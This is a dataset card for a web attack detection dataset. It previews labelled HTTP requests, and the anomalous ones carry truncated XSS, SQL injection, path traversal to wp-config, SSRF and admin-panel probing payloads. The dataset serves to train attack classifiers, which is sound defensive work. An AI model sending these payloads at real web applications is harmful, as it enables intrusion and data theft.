GET /rest/products/search?q=<FRAMESET><FRAME SRC="javascript:javascript:alert(8641);"></FRAMESET> HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain... | anomalous | Cross_Site_Scripting |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: e6a64b5f-4c9c-4649-a888-27db82015032 | normal | none |
POST /wp-admin/admin-ajax.php?template=../../../../../../../wp-config&value=a&min_symbols=1 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 24
Content-Type: application/x-www-form-urlenco... | anomalous | Advanced_Vulnerability_Scan |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/... | anomalous | Cross_Site_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64: rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept-Encoding: gzip | anomalous | Advanced_Vulnerability_Scan |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
... | anomalous | Directory_Traversal |
GET /rest/products/search?q=%74%65%73%74%60%29%2F%2A%21%77%48%45%52%65%2A%2F%37%39%39%32%3D%37%39%39%32%3B%2F%2A%21%73%45%6C%65%43%54%2A%2F%44%42%4D%53%5F%50%49%50%45%2E%72%65%43%45%49%76%65%5F%6D%45%73%73%41%67%65%28%63%48%52%28%31%30%39%29%7C%7C%63%48%52%28%37%38%29%7C%7C%63%48%52%28%31%30%34%29%7C%7C%63%48%52%28%39%... | anomalous | SQL_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | HTML_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | XML_External_Entity |
GET /rest/products/search?q=%74%65%73%74%27%29%2F%2A%21%4F%72%2A%2F%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%37%32%34%35%2F%2A%2A%2F%66%52%4F%6D%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%43%6F%75%6E%54%28%2A%29%2C%63%4F%4E%43%41%54%28%30%78%37%31%37%30%36%32%36%62%37%31%2C%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%28%45%6C%54%28%37%32%... | anomalous | SQL_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: d63c4921-f59e-40c8-8d61-7b014562a3b6 | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | Cross_Site_Scripting |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 49782ca1-7fe0-40eb-ac55-19bb7de01276 | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
... | anomalous | Web_Cache_Deception |
GET /rest/products/search?q=<iFrAmE>HaCkEd bY AtTaCkEr</IfRaMe> HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/... | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=file://0.0.0.0:25 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-def... | anomalous | Server_Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: be4812aa-c553-4976-b0e8-f42e1422e446 | normal | none |
GET /rest/products/search?q=%2D%39%30%34%33%27%2F%2A%21%4F%72%2A%2F%28%2F%2A%21%73%65%6C%65%63%54%2A%2F%28%2F%2A%21%43%61%53%65%2A%2F%2F%2A%21%57%68%45%6E%2A%2F%28%38%36%30%34%3D%37%34%31%36%29%2F%2A%21%74%48%65%6E%2A%2F%2F%2A%21%6E%55%6C%4C%2A%2F%2F%2A%21%65%6C%73%45%2A%2F%43%54%58%53%59%53%2E%44%52%49%54%48%53%58%2E%... | anomalous | SQL_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 474bad5d-ef7d-4da5-b859-9467c965033e | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 69127516-4a51-4250-b1a5-e595379ac2e6 | normal | none |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*... | anomalous | Directory_Traversal |
GET /rest/products/search?q=%74%65%73%74%22%29%2F%2A%21%41%73%2A%2F%6B%6E%6A%73%2F%2A%21%57%68%65%72%45%2A%2F%33%37%39%31%3D%33%37%39%31%2F%2A%21%41%6E%44%2A%2F%52%6F%77%28%39%33%38%39%2C%31%36%39%30%29%2F%2A%21%4E%4F%74%2A%2F%2F%2A%21%62%65%74%77%65%45%4E%2A%2F%30%2F%2A%21%41%6E%44%2A%2F%28%2F%2A%21%53%65%6C%45%43%74%... | anomalous | SQL_Injection |
GET /manager/html HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Authorization: Basic UUNDOmtkc3hj
Accept-Encoding: gzip
Connection: close | anomalous | Advanced_Vulnerability_Scan |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x... | anomalous | LDAP_Injection |
GET /?ref=5a49f335-602c-4b8c-a575-3a1f326f62b2&session_token=5646 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 5a49f335-602c-4b... | normal | none |
End of preview. Expand in Data Studio
web-attack-detection-dataset
A comprehensive dataset for web attack detection and classification, containing balanced HTTP traffic data with various attack types.
This dataset includes:
- Normal HTTP requests for benign traffic
- Anomalous HTTP requests representing different attack vectors
- 16 different attack types including SQL injection, XSS, LFI, etc.
- Balanced distribution to prevent overfitting
Dataset Information
- Training set: 105,757 records (11.5 MB)
- Validation set: 15,855 records (1.7 MB)
- Total records: 121,612
- Attack types: 16 categories
- Format: Apache Parquet (compressed)
Data Format
- raw-request: Raw HTTP request string
- label: Classification label ("normal" or "anomalous")
- attack_type: Specific attack type (empty for normal requests)
Usage
from datasets import load_dataset
# Load the dataset
dataset = load_dataset("web-attack-detection-dataset")
# Access train and test splits
train_data = dataset['train']
test_data = dataset['test']
# Dataset info
print(f"Training samples: {len(train_data)}")
print(f"Test samples: {len(test_data)}")
Statistics
- Training set: 105,757 records (11.5 MB)
- Validation set: 15,855 records (1.7 MB)
- Total records: 121,612
- Attack types: 16 categories
- Format: Apache Parquet (compressed)
License
Please check the original dataset license and usage terms.
- Downloads last month
- 7